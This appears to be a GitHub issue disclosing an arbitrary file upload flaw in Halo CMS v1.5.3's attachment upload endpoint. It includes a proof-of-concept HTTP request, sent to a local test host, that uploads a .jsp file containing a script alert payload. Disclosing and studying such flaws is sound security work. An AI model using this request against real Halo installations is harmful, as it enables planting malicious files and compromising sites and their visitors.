
Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload #1

Open
@zongdeiqianxing

Description

https://github.com/halo-dev/halo/

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp, html, etc.

Proof of Concept

POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 219
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
Connection: close

------WebKitFormBoundaryFxTUuVBMVJqfHQHX
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: application/octet-stream

1<script>alert(1)</script>
------WebKitFormBoundaryFxTUuVBMVJqfHQHX--


permalink: AttachmentServiceImpl.java L110
Security is not checked in the relevant code